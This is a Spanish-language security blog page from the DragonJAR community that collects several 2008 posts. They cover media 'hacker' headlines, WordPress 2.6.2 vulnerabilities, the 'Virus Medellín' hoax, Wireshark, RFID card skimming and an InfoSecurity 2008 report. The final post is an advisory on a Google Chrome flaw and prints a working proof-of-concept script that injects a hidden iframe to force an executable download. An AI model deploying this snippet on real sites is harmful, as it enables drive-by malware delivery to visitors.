La Comunidad DragonJAR

Las últimas dos semanas los “Hackers” han sido el centro de atención, o por lo menos el tema de la Seguridad Informática, solo basta con hacer un pequeño recorrido por los diferentes titulares de algunos medios para notarlo.

Nota aclaratoria 1 – Utilizo el término “hacker” según lo utilizan algunos medios de (des)información. Medios que jamás en la vida alcanzarán a leer la entrada “Hackers en Colombia“, y muchos menos implementarán el término: Delincuente informático.

Nota aclaratoria 2 – No sólo son titulares de Colombia… es que hombre!!. De esto ningún país se salva.

Grupo de hackers atrapados por firmar su ataque con nombre y correo verídicos

Ahora los “defacers” o “hackers”, (para nosotros: delincuentes informáticos) que atacaron una web del gobierno, esperan penas de hasta 10 años.

Peruanos hackean web Argentina y ponen gol de Johan Fano

Lo mismo que la anterior, pero ahora dirijido contra el negocio familiar.
Por lo menos el jugador de futbol está presentable, no me imagino una foto del “Tino” Asprilla.

Leer más…

Ayer se llevo a cabo en Bogotá el Segundo Foro Internacional de Seguridad Informática Empresarial organizado por la Casa Editorial El Tiempo en el que anunciaban con bombos y platillos a Kevin Mitnick “”"”"”El Rey de los Hackers“”"”"”* como uno de los conferencistas del evento.

Algunos usuarios de La Comunidad DragonJAR asistieron al evento y han publicado sus opiniones del mismo en la noticia donde se anuncio el evento, les dejo a continuación la versión de @lmeyda sobre este foro ya que me parece la mas acertada al tratarse de un evento “Empresarial” . Leer más…

La versión 2.6.2 de WordPress lanzada ayer,soluciona dos graves agujeros de seguridad que pueden afectar seriamente a cualquier blog que utilice este popular CMS y permita el registro libre de usuarios.

Ryan Boren fue el encargado  de dar a conocer las 2 vulnerabilidades (SQL Column Truncation y mt_rand()) en el blog oficial de desarrollo de WordPress, el primero fallo, permite manipular las cuentas de usuario, cambiando su contraseña por otra generada “aleatoriamente”, la nueva contraseña no es visible pero aquí es donde pone su grano de arena el otro bug descubierto en la funcion mt_rand() por Boren ya que gracias a este el atacante puede identificar la nueva contraseña generada de forma “aleatoria”. Leer más…

Jorge Cuervo quien cubrió el evento InfoSecurity 2008 para La Comunidad DragonJAR, nos envía unos pequeños tips en respuesta del Análisis al “Virus Medellín” realizado por la comunidad.

Los virus del tipo “Saludos de Medellín” y “Hola Medellín“, pese a la sencillez de su código y poca efectividad, puede convertirse para los atacantes en un arma de gran valor de ingeniería social para analizar el tipo de seguridad y las políticas implementadas en las organizaciones infectadas por este código malicioso. Gracias a la divulgación de los medios masivos de comunicación, se pone al descubierto el nivel de seguridad que se maneja en estas instituciones, en el caso, la Fiscalia de Bucaramanga, cuyos equipos deben almacenar información critica, representada en procesos judiciales, documentos de inteligencia e investigaciones de tipo judicial. Leer más…

Aunque la entrada debería ser Análisis del “Virus Medellín” o de cómo intentamos infectarnos sin éxito.

El supuesto “virus Medellín” fué la noticia del día, o por lo menos yo me enteré apenas hoy de ella. En diferentes medios se habló de la destrucción masiva de este “todo poderoso” virus de la super muerte.

Los titulares de los medios

Virus “Medellín” atacó computadores Locales

El ‘Virus Medellín’ causa estragos en los computadores de Santander

Virus Medellín ataca PC

Incluso en el foro de la Comunidad alcancé a leer algunas entradas relacionadas con este tema:

Alerta virus en medellín

Pero debo ser sincero. Lo primero que llegó a mi mente al leer esta noticia fue:

“No falta el que recibió un mensaje del tipo reenviaselo a 500 mil amigos en menos de 5 segundos” y lo publicó en alguna web.

Es que ahora, lastimosamente nos hemos acostumbrado a recibir el típico correo electrónico de A0L, Nort0n, o similares, sobre el peligrosísimo virus recién descubierto y publicado en la CNN, donde el virus te habla y te dice que perderás todos tus datos destruyendo el sector zero del disco duro, además de que puede transmitirse a tu nevera descongelando el pollo y pudriendo los tomátes. (No quiero imaginarme el efecto en una lavadora).

Leer más…

Wiresharkes un capturador/analizador de paquetes de red (llamado a veces, sniffer o esnifer). Wireshark te permitirá ver, aun nivel bajo y detallado, qué está pasando en tu red. Además es gratuito, open source, y multiplataforma. Sin duda la mejor opción al momento de auditar nuestra red.

Posee una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras)

¿Para que/quien es util Wireshark?

• Administradores lo usan para resolver problemas en la red
• Ingenieros lo usan para examinar problemas de seguridad
• Desarrolladores lo usan para depurar la implementación de los protocolos de red
• Estudiantes los usan para aprender internamente cómo funciona una red

Seguir leyendo en casidiablo..

En Boing Boing, me encontré un vídeo de marzo de este año donde muestran lo BARATO (un sniffer de RFID vale 8 dolares en eBay) y sencillo que resulta capturar información de una tarjeta de crédito RFID con solo estar.

Tendremos que usar ese tipo de billeteras ya que en un metro, transmilenio o cualquier sistema de transporte masivo seria muy sencillo ser victimas del robo de información en tarjetas de crédito RFID.

El pasado 3 de septiembre se realizó en el Hotel Sheraton de Bogotá el congreso InfoSecurity edición 2008, uno de los eventos mas importantes en el ámbito empresarial de la seguridad informática en latinoamerica.

Lamentablemente no pude asistir al evento pero para no desperdiciar la invitación que me regalo el Ingeniero Alejandro Hernandez de ISEC-Global.com en el Seminario Securinf de Popayán envie un corresponsal y aquí nos envía un “reporte” del evento…

INFOSECURITY 2008
PANORAMA DE LA SEGURIDAD EN NUESTRA REGION.

Por Ing. Jorge A. Cuervo
Para La Comunidad DragonJAR

Una vez más brilla Infosecurity por la calidad en la organización de esta serie de eventos regionales de seguridad y la calidad de los ponentes de las casas de software y hardware invitados en esta ocasión a la versión 2008 de Infosecurity.

En esta oportunidad asistieron Symantec, i-Sec, WATCHGUARD, SECURE COMPUTING, NOVELL, HAURI, APC, PANDA ID, MICROSOFT, BARCELONA 04, GLOBAL CROSSING, y la Unidad de Delitos Informáticos de la DIJIN – POLICIA NACIONAL COLOMBIANA-.

Luego de una maratónica jornada que se inicia con la acreditación a las 8 de la mañana hasta las 7 de la noche, un excelente stand con coffee permanente, que no recuerdo haber tenido tiempo para visitar, y unos deliciosos coffee break, podremos concluir que fue una jornada exitosa, donde una vez más, como es natural en esta serie de eventos en nuestros país, salimos con unas muy presentables bolsitas llenas de publicidad, lapiceros, taquitos de papel, y una mirada perdida por la cantidad de preguntas, más que respuestas, que taladran nuestra atención hasta ser disipada por una de las lindas modelos que con su mirada picara y una sonrisa fulminante nos dice “gracias por asistir”, tomamos un respiro, la miramos maliciosamente a los ojos y pensamos “si, valió la pena asistir”.

En mi vuelo de regreso a casa, lanzo una mirada a la cantidad de publicidad y me asombra la incontenible batalla de aplicaciones que inundan al mercado ofreciendo la panacea a los problemas de seguridad, administración y control de la información de nuestros más preciados activos.

¿Que se vio en Infosecurity 2008? Leer más…

El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome